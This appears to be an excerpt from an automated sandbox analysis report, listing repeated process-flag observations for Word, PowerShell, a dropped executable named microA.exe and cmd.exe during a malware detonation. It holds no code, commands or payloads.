Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
